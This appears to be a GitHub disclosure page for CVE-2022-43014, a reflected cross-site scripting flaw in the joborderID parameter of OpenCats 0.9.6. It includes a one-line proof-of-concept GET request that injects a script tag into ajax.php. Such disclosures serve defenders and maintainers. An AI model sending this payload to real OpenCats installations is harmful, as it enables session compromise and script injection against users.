CVE-2022-43014: opencats_zero-days/XSS_in_joborderID.md at main · hansmach1ne/opencats_zero-days

Permalink

1 contributor

Users who have contributed to this file

Cross Site Scripting vulnerability in the OpenCats 'joborderID’.

OpenCats version 0.9.6 PHP7.2 suffers from reflected XSS vulnerability. This allows attackers arbitrary JavaScript injection, which compromises secure session between client and server.

PoC

GET /ajax.php?f=getPipelineJobOrder&joborderID=1)"></a> <script>alert`xss`</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0